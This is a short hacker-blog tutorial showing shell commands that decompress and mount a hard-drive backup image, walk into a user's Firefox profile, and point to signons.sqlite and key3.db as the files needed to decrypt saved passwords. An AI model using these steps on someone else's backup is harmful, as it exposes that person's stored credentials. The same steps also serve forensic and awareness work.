Recovering Browser stored credentials from Hard Drive Backup
If you use “Remember password” facility provided by your browser then this post is seriously going to disturb you. Suppose we have a compressed backup of a hard drive :
gr00ve_hack3r@Magnum-Opus:/tmp/exp# file userpart.gz.dd
userpart.gz.dd: gzip compressed data, from Unix, last modified: Thu Oct 7 09:11:26 2010
gr00ve_hack3r@Magnum-Opus:/tmp/exp# mv userpart.gz.dd userpart.dd.gz
gr00ve_hack3r@Magnum-Opus:/tmp/exp# gunzip userpart.dd.gz
gr00ve_hack3r@Magnum-Opus:/tmp/exp# ls -l
total 48129
-rwxrw-rw- 1 root root 49283072 2013-03-28 10:39 userpart.dd
gr00ve_hack3r@Magnum-Opus:/tmp/exp# file userpart.dd
userpart.dd: Linux rev 1.0 ext3 filesystem data, UUID=4a6b1170-0250-4b03-96b7-22dd7b432002 (needs journal recovery)
gr00ve_hack3r@Magnum-Opus:/tmp/exp# mount -o loop userpart.dd mount_here/
gr00ve_hack3r@Magnum-Opus:/tmp/exp# ls -l mount_here/
total 13
drwxr-xr-x 26 postgres postgres 1024 2010-10-07 09:01 hacker
drwx------ 2 root root 12288 2010-10-07 05:03 lost+found
gr00ve_hack3r@Magnum-Opus:/tmp/exp# cd mount_here/hacker/
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker# ls
Desktop Documents Downloads examples.desktop Music Pictures Public Templates Videos
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker# ls -la
total 66
. .gconf Public .. .gconfd .pulse .bash_history .gnome2 .pulse-cookie .bash_logout .gnome2_private .sudo_as_admin_successful .bashrc .gtk-bookmarks Templates .cache .gvfs .themes .config .ICEauthority .thumbnails .dbus .icons .update-notifier Desktop .local .vboxclient-clipboard.pid .dmrc .mozilla .vboxclient-display.pid Documents Music .vboxclient-seamless.pid Downloads .nautilus Videos .esd_auth Pictures .xsession-errors examples.desktop .profile .xsession-errors.old
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker# cd .mozilla/
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker/.mozilla# ls
extensions firefox
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker/.mozilla# cd firefox/
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker/.mozilla/firefox# ls
42zgnxx7.default profiles.ini
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker/.mozilla/firefox# cd 42zgnxx7.default/
gr00ve_hack3r@Magnum-Opus:/tmp/exp/mount_here/hacker/.mozilla/firefox/42zgnxx7.default# ls
bookmarkbackups extensions.cache pluginreg.dat bookmarks.html extensions.ini prefs.js Cache extensions.rdf search.json cert8.db formhistory.sqlite search.sqlite chrome key3.db secmod.db compatibility.ini localstore.rdf signons.sqlite compreg.dat lock urlclassifier3.sqlite content-prefs.sqlite mimeTypes.rdf urlclassifierkey3.txt cookies.sqlite OfflineCache webappsstore.sqlite cookies.sqlite-journal permissions.sqlite XPC.mfasl downloads.sqlite places.sqlite xpti.dat extensions places.sqlite-journal XUL.mfasl
signons.sqlite and key3.db are two files that we need specifically for this purpose. Now you can easily crack the encrypted information as you have your hands on Cipher Text and Key .